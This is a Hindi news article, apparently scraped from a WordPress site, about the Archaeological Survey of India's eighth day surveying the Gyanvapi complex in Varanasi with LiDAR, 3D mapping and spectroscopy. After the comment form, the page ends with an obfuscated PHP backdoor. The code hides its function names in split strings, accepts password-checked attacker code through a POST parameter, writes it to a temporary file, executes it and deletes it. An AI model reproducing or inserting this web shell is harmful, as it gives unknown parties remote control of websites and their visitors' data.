ज्ञानवापी परिसर में 8वें दिन का सर्वे जारी, GPR से सामने आएगा सच, स्टडी कर रही ASI टीम

Uttarakhand Press 10 August 2023: वाराणसी के ज्ञानवापी परिसर का आज आठवां दिन है। भारतीय पुरातत्व सर्वेक्षण (एएसआई) की टीम सर्वे कर रही है। ज्ञानवापी के बाहर सुरक्षा के कड़े इंतजाम किए गए हैं। एक टीम अब भी पश्चिमी दीवार के भीतरी हिस्से में ऊपर और नीचे के तहखाने की जांच कर रही है।

बता दें कि बुधवार को भारतीय पुरातत्व सर्वेक्षण (एएसआई) की टीम ने बुधवार को तहखानों की दीवारों और सतह की थ्रीडी मैपिंग की। इसके साथ ही पश्चिमी दीवार और तहखानों के पास पड़े मलबे को भी रिकाॅर्ड में दर्ज किया। करीब सात घंटे तक चले सर्वे के दौरान परिसर के हर हिस्से की फोटो और वीडियोग्राफी कराई गई। सतह से लेकर निर्माण तक के आकलन को ट्रोपोग्राफी शीट पर उतारा गया। अलग-अलग हिस्सों में एएसआई की टीम ने अपनी मशीनों से रिकाॅर्ड का आकलन किया।

बुधवार को एएसआई की टीम सुबह करीब आठ बजे ज्ञानवापी परिसर में दाखिल हुई और इसके बाद सर्वे की कार्यवाही शुरू की। टीम ने तहखानों के निर्माण शैली, अंदर की बनावट आदि को देखा। इसके साथ ही परिसर की फोटो व वीडियोग्राफी कराई। परिसर के अलग अलग हिस्सों में लिडार (लाइट डिटेक्शन एंड रेंजिंग) मशीन से संरचनाओं का नक्शा तैयार किया। पोर्टेबल एक्सरे प्रतिदीप्ति स्पेक्ट्रोस्कोपी मशीन से भी सतह की जांच की गई।

ज्ञानवापी में एएसआई की टीम सर्वे कर रही है। एक टीम अब भी पश्चिमी दीवार के भीतरी हिस्से में ऊपर और नीचे के तहखाने की जांच कर रही है।

Read Previous

Nainital जंगल में होगी रकसिया नाले की जलनिकासी, यूयूएसडीए ने बनाई 30 करोड़ की डीपीआर

Read Next

बड़ा हादसा: तेज रफ्तार गाड़ी ने पीछे से ट्राले में मारी टक्कर, चार लोगों की मौत, एक गंभीर रूप से घायल

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}